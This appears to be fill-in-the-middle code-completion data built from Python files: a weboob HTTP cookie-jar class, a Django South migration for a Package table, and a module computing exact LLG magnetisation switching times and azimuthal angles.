yield cookie
if rfc2965:
<|fim_middle|>
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def <|fim_middle|>(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | from_cookiejar |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def <|fim_middle|>(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | export |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def <|fim_middle|>(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | _cookies_from_attrs_set |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def <|fim_middle|>(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | make_cookies |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def <|fim_middle|>(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | copy |
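A short usage sketch of the jar's public surface as shown above (`from_cookiejar`, `export`, `copy`); the import path and session wiring are illustrative assumptions, not confirmed by these rows:

```python
# Usage sketch -- assumes the cookies.py shown above is importable as a module.
import requests
from cookies import WeboobCookieJar  # hypothetical import path

session = requests.Session()
session.cookies = WeboobCookieJar.from_cookiejar(session.cookies)
session.get("https://example.org/")
session.cookies.export("cookies.lwp")  # written even if expired/discardable
backup = session.cookies.copy()        # independent jar, same cookies
```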
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),<|fim▁hole|>
complete_apps = ['api']<|fim▁end|> | 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
} |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
<|fim_middle|>
<|fim▁end|> | def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api'] |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
<|fim_middle|>
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url']) |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
<|fim_middle|>
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package') |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def <|fim_middle|>(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def backwards(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | forwards |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Package'
db.create_table(u'api_package', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'api', ['Package'])
# Adding unique constraint on 'Package', fields ['name', 'url']
db.create_unique(u'api_package', ['name', 'url'])
def <|fim_middle|>(self, orm):
# Removing unique constraint on 'Package', fields ['name', 'url']
db.delete_unique(u'api_package', ['name', 'url'])
# Deleting model 'Package'
db.delete_table(u'api_package')
models = {
u'api.package': {
'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
}
}
complete_apps = ['api']<|fim▁end|> | backwards |
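The frozen ORM dict and `create_table` calls above fully pin down the schema; for reference, the same `Package` written as an ordinary Django model, a sketch inferred from the migration since the app's actual models.py is not in these rows:

```python
# Inferred from the migration above; not the app's actual models.py.
from django.db import models

class Package(models.Model):
    name = models.CharField(max_length=500, unique=True, db_index=True)
    url = models.CharField(max_length=500, unique=True)
    created_at = models.DateField(auto_now_add=True)

    class Meta:
        unique_together = (("name", "url"),)
```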
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \<|fim▁hole|> # Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()<|fim▁end|> | calculate_equivalent_dynamics(magnetic_parameters, pols)
|
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
<|fim_middle|>
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c) |
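# A minimal sketch of the parameter object calculate_switching_time expects.
# The interface (H(t) and Hk() as callables, alpha and gamma as attributes)
# is inferred from the call sites above; the real simpleode class may differ.
from math import pi

class FakeMagneticParameters(object):
    def __init__(self, H=2.0, Hk=0.5, alpha=0.7, gamma=1.0):
        self._H, self._Hk = H, Hk              # needs H != Hk, or the
        self.alpha, self.gamma = alpha, gamma  # prefactor divides by zero
    def H(self, t):
        return self._H                         # field is constant in time here
    def Hk(self):
        return self._Hk

mag = FakeMagneticParameters()
t_switch = calculate_switching_time(mag, pi/18, 17*pi/18)
assert t_switch > 0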
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
<|fim_middle|>
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
